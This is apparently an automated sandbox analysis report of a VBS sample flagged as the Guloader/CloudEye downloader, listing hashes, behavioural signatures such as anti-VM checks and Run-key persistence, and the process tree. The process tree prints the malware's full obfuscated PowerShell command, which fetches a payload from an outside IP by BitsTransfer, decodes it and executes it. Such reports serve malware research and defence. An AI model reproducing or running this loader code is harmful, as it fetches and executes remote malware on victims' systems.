Analysis
-
max time kernel
152s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
12/04/2023, 03:42
General
-
Target
a75c770acab8755ebc617f8925eff3b4.vbs
-
Size
34KB
-
MD5
a75c770acab8755ebc617f8925eff3b4
-
SHA1
3368ba6a1379d325bd9f0ccfe207f4963217b9c9
-
SHA256
926fe7f70c86b5c16a632344191820206772f8c53ac075446b138d209a1bf22a
-
SHA512
2f98c7848fcb81dc39772bc3129be29c3f22ebce2cca03da3150e9f75e2f9fd472ef4301782f91c23f65a9d6f93957e653862f723b5f99293f609430caa715a6
-
SSDEEP
768:UObC4BcJLusxj/gqJ77UkZb3d8IbXK4HkMsFkafl:J24B2usBveebNzb6kul
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a75c770acab8755ebc617f8925eff3b4.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
19.9MB
-
Filesize
19.9MB
-
Filesize
19.9MB
-
Filesize
19.9MB
-
Filesize
19.9MB
-
Filesize
6.5MB
-
Filesize
80KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
120KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
19.9MB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
64KB